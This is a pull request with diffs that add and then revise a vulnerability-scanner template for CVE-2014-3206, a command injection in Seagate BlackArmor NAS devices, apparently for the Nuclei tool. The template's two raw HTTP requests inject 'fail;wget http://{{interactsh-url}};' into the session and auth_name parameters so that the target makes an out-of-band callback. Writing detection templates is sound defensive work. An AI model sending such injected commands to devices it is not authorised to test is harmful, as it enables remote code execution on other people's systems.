### PR TITLE
Create CVE-2014-3206.yaml

### DIFF
--- a/cves/2014/CVE-2014-3206.yaml
+++ b/cves/2014/CVE-2014-3206.yaml
@@ -1,19 +1,19 @@
 id: CVE-2014-3206
 
 info:
-  name: Seagate BlackArmor NAS - command injection
+  name: Seagate BlackArmor NAS - Command Injection
   author: gy741
   severity: critical
   description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-3206
     - https://www.exploit-db.com/exploits/33159
-  tags: cve,cve2014,nas,seagate,mirai,gafgyt,rce
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.80
     cve-id: CVE-2014-3206
     cwe-id: CWE-20
+  tags: cve,cve2014,seagate,rce
 
 requests:
   - raw:

--- a/cves/2014/CVE-2014-3206.yaml
+++ b/cves/2014/CVE-2014-3206.yaml
@@ -1,14 +1,14 @@
 id: CVE-2014-3206
 
 info:
-  name: Seagate BlackArmor NAS - command injection 
+  name: Seagate BlackArmor NAS - command injection
   author: gy741
   severity: critical
   description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-3206
     - https://www.exploit-db.com/exploits/33159
-  tags: cve,cve2014,nas,seagate,mirai,gafgyt
+  tags: cve,cve2014,nas,seagate,mirai,gafgyt,rce
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.80
@@ -33,4 +33,3 @@ requests:
         part: interactsh_protocol
         words:
           - "http"
-

--- a/cves/2014/CVE-2014-3206.yaml
+++ b/cves/2014/CVE-2014-3206.yaml
@@ -1,0 +1,36 @@
+id: CVE-2014-3206
+
+info:
+  name: Seagate BlackArmor NAS - command injection 
+  author: gy741
+  severity: critical
+  description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-3206
+    - https://www.exploit-db.com/exploits/33159
+  tags: cve,cve2014,nas,seagate,mirai,gafgyt
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2014-3206
+    cwe-id: CWE-20
+
+requests:
+  - raw:
+      - |
+        GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+      - |
+        GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+    unsafe: true
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2014-3206

Although the vulnerability is old, it is still used by IoT malware.

```
Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
```

Happy New Year. :)

- References: https://nvd.nist.gov/vuln/detail/CVE-2014-3206

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO